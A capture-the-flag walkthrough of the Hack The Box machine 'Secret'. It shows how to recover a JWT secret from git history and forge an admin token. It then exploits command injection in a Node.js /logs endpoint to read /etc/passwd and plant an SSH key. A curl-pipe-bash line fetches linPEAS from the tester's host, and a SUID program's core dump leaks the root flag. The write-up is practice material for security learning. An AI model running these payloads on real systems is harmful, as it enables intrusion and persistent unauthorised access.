Walkthrough: Secret - Hack The Box

15 minute read

Secret Info Card

In this box, we use the git history of some provided source code to uncover an environment variable. This allows us to sign our own session tokens and leverage a lack of input sanitization to get ssh access to the box.

After that, we exploit setuid privileges and the ability to generate core dumps on a custom script found on the box to gain access to the root flag.

Nmap

First, we’ll start by running nmap. We’re not under a time crunch here, so we’ll just enumerate as much as we can by using the -A and -p- options.

nmap -A -p- -T4 10.10.11.120

Note: The box’s IP was 10.10.11.120 when I completed this.

Results:

Nmap scan report for 10.10.11.120
Host is up (0.076s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
|   256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_  256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: DUMB Docs
3000/tcp open  http    Node.js (Express middleware)
|_http-title: DUMB Docs
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/11%OT=22%CT=1%CU=44108%PV=Y%DS=2%DC=T%G=Y%TM=618D82
OS:4A%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   80.74 ms 10.10.14.1
2   75.67 ms 10.10.11.120

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.13 seconds

Looking through the above, here’s what we found.

Port Service Product/Version Notes
22 SSH 8.2p1 Ubuntu 4ubuntu0.3 This is a pretty recent version of OpenSSH, so it’ not likely going to be our path in. At least it lets us know that this is an Ubuntu server
80 HTTP nginx 1.18.0 This is likely to be an nginx reverse proxy. The site title it’s advertising is “DUMB Docs”
3000 HTTP Node.js Interestingly, the site title for this port is also “DUMB Docs”. Maybe this was a misconfiguration and was meant to be behind the nginx proxy on port 80, but instead of listening on localhost it was set to listen externally as well?

Foothold

Browsing around on both the port 80 site and the port 3000 site don’t really show any differences. It’s starting to seem more likely that it’s just a misconfiguration then.

Going to http://10.10.11.120/ leads us to a web page for a product called DUMB Docs.

DUMB Docs Homepage

If we follow the link to download the source code and take a look into it, we can see that there is a .env file that contains the following

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret

This is interesting. Searching through all the files we find that this TOKEN_SECRET value is used to sign and verify all of the JSON Web Tokens (JWTs), which are used for session tokens throughout the API.

There’s also this undocumented /logs API endpoint in routes/private.js

router.get('/logs', verifytoken, (req, res) => {
    const file = req.query.file;
    const userinfo = { name: req.user }
    const name = userinfo.name.name;
    
    if (name == 'theadmin'){
        const getLogs = `git log --oneline ${file}`;
        exec(getLogs, (err , output) =>{
            if(err){
                res.status(500).send(err);
                return
            }
            res.json(output);
        })
    }
    else{
        res.json({
            role: {
                role: "you are normal user",
                desc: userinfo.name.name
            }
        })
    }
})

This exec() call is definitely the vulnerability we need to exploit. There’s no input validation at all. We just need to figure out a way to create an acceptable JWT with the name theadmin.

The docs page conveniently gives a sample JWT for a user called theadmin.

JWT Sample

We can try recreating this token using the TOKEN_SECRET we found in the current .env file and jwt.io, but it doesn’t work. Interestingly though, the source code download from the site is actually a git repo. If we look at the commit history for the repo, we can see that there are a number of old commits. Running

git log

in our CLI returns this

commit e297a2797a5f62b6011654cf6fb6ccb6712d2d5b (HEAD -> master)
Author: dasithsv <[email protected]>
Date:   Thu Sep 9 00:03:27 2021 +0530

    now we can view logs from server 😃

commit 67d8da7a0e53d8fadeb6b36396d86cdcd4f6ec78
Author: dasithsv <[email protected]>
Date:   Fri Sep 3 11:30:17 2021 +0530

    removed .env for security reasons

commit de0a46b5107a2f4d26e348303e76d85ae4870934
Author: dasithsv <[email protected]>
Date:   Fri Sep 3 11:29:19 2021 +0530

    added /downloads

commit 4e5547295cfe456d8ca7005cb823e1101fd1f9cb
Author: dasithsv <[email protected]>
Date:   Fri Sep 3 11:27:35 2021 +0530

    removed swap

commit 3a367e735ee76569664bf7754eaaade7c735d702
Author: dasithsv <[email protected]>
Date:   Fri Sep 3 11:26:39 2021 +0530

    added downloads

commit 55fe756a29268f9b4e786ae468952ca4a8df1bd8
Author: dasithsv <[email protected]>
Date:   Fri Sep 3 11:25:52 2021 +0530

    first commit
                 

Then we can use that hash from the first commit to see the old version of the .env file

git show 55fe756a29268f9b4e786ae468952ca4a8df1bd8:.env

and here’s what shows up

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE

If they haven’t changed the token, we can now use jwt.io to forge session tokens easily. If we copy the payload from the sample JWT in the documentation

{
  "_id": "6114654d77f9a54e00f05777",
  "name": "theadmin",
  "email": "[email protected]",
  "iat": 16287276699
}

and change the secret to the TOKEN_SECRET value we just found (the algorithm and token type default to the correct values), we get this token

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjI4NzI3NjY5OX0.WyUYmOpWU5gYlx2KdIP42G2JOV0fd7UKrQmQnd1gUgo

Sending that as the auth-token header in a GET request to the http://10.10.11.120:3000/api/priv endpoint (I’m using Postman for this, but feel free to use something like Burpsuite instead) gives us this response back

{
    "creds": {
        "role": "admin",
        "username": "theadmin",
        "desc": "welcome back admin"
    }
}

Looks like our token works! Now we just have to exploit that undocumented API endpoint we saw earlier.

User

Getting user.txt

First, just a proof of concept. We’re going to continue to pass the JWT we created earlier in the header as the auth-token for all of our API requests.

Again, this is the code we’re exploiting

router.get('/logs', verifytoken, (req, res) => {
    const file = req.query.file;
    const userinfo = { name: req.user }
    const name = userinfo.name.name;
    
    if (name == 'theadmin'){
        const getLogs = `git log --oneline ${file}`;
        exec(getLogs, (err , output) =>{
            if(err){
                res.status(500).send(err);
                return
            }
            res.json(output);
        })
    }

So basically the endpoint just executes this command and sends back the results

git log --oneline ${file}

We just have to pass in the value of file as a parameter called file.

Let’s try getting user.txt. To do that, we just have to get the server to execute

cat ~/user.txt

To do that, we can make an API request with | cat ~/user.txt in the file parameter, like this

http://10.10.11.120:3000/api/logs?file=| cat ~/user.txt

Note: I used the | at the beginning instead of a ; just to get rid of any extra output from the git logs --oneline call

And we get back the flag! (with an extra \n at the end)

Enumeration

Before we move forward, let’s just figure out a bit more about the environment we’re running in here.

If we request

http://10.10.11.120:3000/api/logs?file=| whoami

we can figure out that the user that’s running the API process is called dasith.

Next let’s try getting /etc/passwd. We’ll request

http://10.10.11.120:3000/api/logs?file=| cat /etc/passwd

and we get back this (I converted the \n characters to newlines)

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
dasith:x:1000:1000:dasith:/home/dasith:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mongodb:x:113:117::/var/lib/mongodb:/usr/sbin/nologin

We can see here that dasith does have ssh login privileges, so that’s good.

Getting a Shell

Let’s focus on getting a shell next. Now that we know we’re running as a user with ssh login privileges, we can just add an ssh key to the user’s authorized_keys file and we can get a nicely-behaving and stable shell going. We’ll need to do a few things for this.

First, create an ssh key using ssh-keygen. I called mine key and didn’t give it a passphrase.

Next, because there’s a little bit of wierdness with the API and + characters, I base-64 encoded the public key.

base64 key.pub -w 0

This will give us back our base-64 encoded public key.

Now we can send the payload. Put the following in the file parameter of a GET request for http://10.10.11.120:3000/api/logs, like we did earlier for the other requests. Remember to add your base-64 encoded key into the spot indicated.

; mkdir ~/.ssh; echo "<BASE-64 ENCODED PUBLIC KEY>" | base64 -d >> ~/.ssh/authorized_keys; chmod 600 ~/.ssh/authorized_keys

This will add our public ssh key to the server as an authorized key. Now all we need to do is connect.

ssh -i key [email protected]

and we’re in!

Root

Enumeration

Let’s start by running linPEAS for some enumeration. Download the most recent release of linpeas.sh to your system, cd into the downloads folder, and run this command on your local box

python -m http.server

Notes: you may have to swap out python with python3 in some environments. This will also expose all the files in that folder to anyone on any networks you’re connected to, so feel free to create a special folder to have just linpeas in before you run this command if you don’t want to expose anything sensitive by accident.

Next, in the ssh session, run

curl http://<YOUR IP>:8000/linpeas.sh | bash

and linPEAS will automatically start up.

There are two sudo vulnerabilities that show up at the very top, but those came out after this box did, so that’s not the intended method. There isn’t too much else that jumps out right away.

However, looking carefully through the SUID section reveals something interesting

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                                                                                                        
-rwsr-xr-x 1 root root 31K May 26  2021 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)                                                                                           
-rwsr-xr-x 1 root root 163K Jan 19  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
...
-rwsr-xr-x 1 root root 18K Oct  7 10:03 /opt/count (Unknown SUID binary)
...

This /opt/count file seems like something custom and also doesn’t seem to be associated with the API we worked on earlier. This must be our next step.

cd-ing into the \opt directory and running ls -la gives us the following

total 56
drwxr-xr-x  2 root root  4096 Oct  7 10:06 .
drwxr-xr-x 20 root root  4096 Oct  7 15:01 ..
-rw-r--r--  1 root root  3736 Oct  7 10:01 code.c
-rw-r--r--  1 root root 16384 Oct  7 10:01 .code.c.swp
-rwsr-xr-x  1 root root 17824 Oct  7 10:03 count
-rw-r--r--  1 root root  4622 Oct  7 10:04 valgrind.log

Let’s try running the program just to get a feel for what it does

./count

The program seems to be designed to list out the number of files in a directory or the number of characters in a file, depending on the input. Since this runs with SUID privileges though, we should be able to access files that would normally only be able to be viewed by root.

code.c contains the source code. We can see it by running

nano code.c

This is the main function

int main()
{
    char path[100];
    int res;
    struct stat path_s;
    char summary[4096];

    printf("Enter source file/directory name: ");
    scanf("%99s", path);
    getchar();
    stat(path, &path_s);
    if(S_ISDIR(path_s.st_mode))
        dircount(path, summary);
    else
        filecount(path, summary);

    // drop privs to limit file write
    setuid(getuid());
    // Enable coredump generation
    prctl(PR_SET_DUMPABLE, 1);
    printf("Save results a file? [y/N]: ");
    res = getchar();
    if (res == 121 || res == 89) {
        printf("Path: ");
        scanf("%99s", path);
        FILE *fp = fopen(path, "a");
        if (fp != NULL) {
            fputs(summary, fp);
            fclose(fp);
        } else {
            printf("Could not open %s for writing\n", path);
        }
    }

    return 0;
}

Looking at this code, our privileges are reduced after we hit the setuid(getuid()) line. However, it still runs with root privileges before that. Also to note is that the prctl(PR_SET_DUMPABLE, 1) line allows us to run core dumps of the process even after our privileges are lowered.

Also in this folder is a file called valgrind.log. Turns out valgrind is a dynamic analysis tool. Its default module is Memcheck, which is used to check for memory errors. There’s a quickstart page, which has some instructions on how to interpret the output of this module.

The valgrind.log file has multiple runs of the program in it, all of which contain similar errors. Here is the section with the final program run

==2662== Memcheck, a memory error detector
==2662== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==2662== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==2662== Command: ./count
==2662== 
Enter source file/directory name: 
Total characters = 224
Total words      = 31
Total lines      = 10
Save results a file? [y/N]: ==2662== 
==2662== HEAP SUMMARY:
==2662==     in use at exit: 472 bytes in 1 blocks
==2662==   total heap usage: 4 allocs, 3 frees, 9,688 bytes allocated
==2662== 
==2662== 472 bytes in 1 blocks are still reachable in loss record 1 of 1
==2662==    at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==2662==    by 0x48D8AAD: __fopen_internal (iofopen.c:65)
==2662==    by 0x48D8AAD: fopen@@GLIBC_2.2.5 (iofopen.c:86)
==2662==    by 0x10984D: filecount (in /opt/count)
==2662==    by 0x1099E5: main (in /opt/count)
==2662== 
==2662== LEAK SUMMARY:
==2662==    definitely lost: 0 bytes in 0 blocks
==2662==    indirectly lost: 0 bytes in 0 blocks
==2662==      possibly lost: 0 bytes in 0 blocks
==2662==    still reachable: 472 bytes in 1 blocks
==2662==         suppressed: 0 bytes in 0 blocks
==2662== 
==2662== For lists of detected and suppressed errors, rerun with: -s
==2662== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)

We can see in the above log that there are memory leaks in the filecount function

==2662==    by 0x10984D: filecount (in /opt/count)

Here’s the function in question

void filecount(const char *path, char *summary)
{
    FILE *file;
    char ch;
    int characters, words, lines;

    file = fopen(path, "r");

    if (file == NULL)
    {
        printf("\nUnable to open file.\n");
        printf("Please check if file exists and you have read privilege.\n");
        exit(EXIT_FAILURE);
    }

    characters = words = lines = 0;
    while ((ch = fgetc(file)) != EOF)
    {
        characters++;
        if (ch == '\n' || ch == '\0')
            lines++;
        if (ch == ' ' || ch == '\t' || ch == '\n' || ch == '\0')
            words++;
    }

    if (characters > 0)
    {
        words++;
        lines++;
    }

    snprintf(summary, 256, "Total characters = %d\nTotal words      = %d\nTotal lines      = %d\n", characters, words, lines);
    printf("\n%s", summary);
}

Carefully reading this shows that the file is opened using fopen(), but it’s never closed. This means that the file contents should still be in process memory even after the function terminates. So if we can cause a core dump after we get the file into memory, we should be able to read it.

Exploit

In this case, I’m just going to try to get the flag instead of going for a full root shell.

First, we’ll start up the program (still in the /opt directory here)

./count

Enter /root/root.txt for the “source file/directory name”. When it asks if you want to save the results to a file, hit CTRL+Z. This will force the program to the background.

Now we can run ps to find the PID for the count file. The results should look something like this

    PID TTY          TIME CMD
   1357 pts/0    00:00:00 bash
  30782 pts/0    00:00:00 count
  30784 pts/0    00:00:00 ps

Let’s run

kill -SIGSEGV <PID>

to kill the process and cause a core dump. We can confirm this worked by running fg to bring the count program back to the foreground. The output should look something like this

./count
Segmentation fault (core dumped)

Since this is an Ubuntu server, all of the core dumps are handled by an app called apport and all of the core dumps are stored in /var/crash.

cd /var/crash
ls -la

Results

total 88
drwxrwxrwt  2 root   root    4096 Mar 25 05:18 .
drwxr-xr-x 14 root   root    4096 Aug 13  2021 ..
-rw-r-----  1 root   root   27203 Oct  6 18:01 _opt_count.0.crash
-rw-r-----  1 dasith dasith 28157 Mar 25 05:18 _opt_count.1000.crash
-rw-r-----  1 root   root   24048 Oct  5 14:24 _opt_countzz.0.crash

Here we can see there’s one .crash file that’s owned by our user, dasith. That’s the one we just created.

These crash files can be unpacked into multiple files, so let’s create a new directory to put all of the extracted files into

mkdir ~/.temp_dir

Let’s extract the files using the following command

apport-unpack _opt_count.1000.crash ~/.temp_dir

Now we’ll head to that temporary directory and see what we extracted.

cd ~/.temp_dir
ls -la

Results

total 440                                                                                                                                                                                                          
drwxrwxr-x  2 dasith dasith   4096 Mar 25 05:27 .                                                                                                                                                                  
drwxr-xr-x 13 dasith dasith   4096 Mar 25 05:26 ..                                                                                                                                                                 
-rw-rw-r--  1 dasith dasith      5 Mar 25 05:27 Architecture                                                                                                                                                       
-rw-rw-r--  1 dasith dasith 380928 Mar 25 05:27 CoreDump                                                                                                                                                           
-rw-rw-r--  1 dasith dasith     24 Mar 25 05:27 Date                                                                                                                                                               
-rw-rw-r--  1 dasith dasith     12 Mar 25 05:27 DistroRelease                                                                                                                                                      
-rw-rw-r--  1 dasith dasith     10 Mar 25 05:27 ExecutablePath                                                                                                                                                     
-rw-rw-r--  1 dasith dasith     10 Mar 25 05:27 ExecutableTimestamp                                                                                                                                                
-rw-rw-r--  1 dasith dasith      1 Mar 25 05:27 _LogindSession                                                                                                                                                     
-rw-rw-r--  1 dasith dasith      5 Mar 25 05:27 ProblemType                                                                                                                                                        
-rw-rw-r--  1 dasith dasith      7 Mar 25 05:27 ProcCmdline                                                                                                                                                        
-rw-rw-r--  1 dasith dasith      4 Mar 25 05:27 ProcCwd                                                                                                                                                            
-rw-rw-r--  1 dasith dasith     97 Mar 25 05:27 ProcEnviron                                                                                                                                                        
-rw-rw-r--  1 dasith dasith   2144 Mar 25 05:27 ProcMaps                                                                                                                                                           
-rw-rw-r--  1 dasith dasith   1340 Mar 25 05:27 ProcStatus                                                                                                                                                         
-rw-rw-r--  1 dasith dasith      2 Mar 25 05:27 Signal                                                                                                                                                             
-rw-rw-r--  1 dasith dasith     29 Mar 25 05:27 Uname                                                                                                                                                              
-rw-rw-r--  1 dasith dasith      3 Mar 25 05:27 UserGroups

What we’re interested in is the CoreDump file. If we were actually debugging this, we could use gdb to analyze it, but in our case we can just use strings to get the flag.

strings CoreDump

This will output all of the strings in this binary. Scrolling through, we can see there’s one string that looks to be about the right size for a flag. In my case, this is what it looked like

...
|U6{U
|U6{U
U6{U
{U6{U
{U6{U
a655a8366790cb876f2a103c41a63e79
aliases
ethers
group
gshadow
hosts
initgroups
...

And that’s it! We’re done.

Thoughts

I had some issues figuring out how to generate the core dump because my initial research told me I should only have to quit the program to generate a core dump instead of sending a seg fault. I also felt really dumb after spending an hour or two on the foothold and not getting anywhere. However, I did have a lot of fun with this box and I think it deserves its “Easy” rating on the site.

Updated: